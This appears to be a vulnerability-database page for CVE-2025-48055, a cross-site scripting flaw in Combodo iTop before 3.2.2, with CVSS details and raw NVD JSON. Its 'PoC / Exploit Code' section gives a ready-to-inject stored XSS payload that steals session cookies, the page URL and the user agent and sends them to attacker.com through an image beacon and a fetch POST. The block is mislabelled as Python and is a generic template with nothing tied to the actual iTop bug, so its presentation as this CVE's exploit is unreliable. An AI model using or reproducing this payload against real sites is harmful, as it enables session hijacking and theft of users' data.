Security Vulnerability Report
中文
CVE-2025-48055 CVSS 8.5 HIGH

CVE-2025-48055

Published: 2025-11-10 21:15:39
Last Modified: 2025-11-21 21:12:36

Description

Combodo iTop is a web based IT service management tool. In versions prior to 3.2.2, when displaying content in a browse brick in the user portal, a cross-site scripting attack can occur. This is fixed in versions 3.2.2 and 3.3.0.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* - VULNERABLE
Combodo iTop < 3.2.2
Combodo iTop < 3.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Stored XSS PoC for CVE-2025-48055 --> <!-- Inject this payload into a browse brick field in Combodo iTop --> <script> // Steal session cookies var cookies = document.cookie; var img = new Image(); img.src = 'https://attacker.com/log?c=' + encodeURIComponent(cookies); // Alternative: Exfiltrate data via fetch fetch('https://attacker.com/api/steal', { method: 'POST', mode: 'no-cors', body: JSON.stringify({ cookies: cookies, url: window.location.href, userAgent: navigator.userAgent }) }); </script> <!-- Shortened payload for testing --> <img src=x onerror="fetch('https://attacker.com/log?c='+document.cookie)">

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48055", "sourceIdentifier": "[email protected]", "published": "2025-11-10T21:15:38.907", "lastModified": "2025-11-21T21:12:36.060", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Combodo iTop is a web based IT service management tool. In versions prior to 3.2.2, when displaying content in a browse brick in the user portal, a cross-site scripting attack can occur. This is fixed in versions 3.2.2 and 3.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.2.2", "matchCriteriaId": "B5ED6F6C-CCC3-44E4-A6A4-93B639B13E6B"}]}]}], "references": [{"url": "https://github.com/Combodo/iTop/security/advisories/GHSA-684h-f39j-5gq8", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}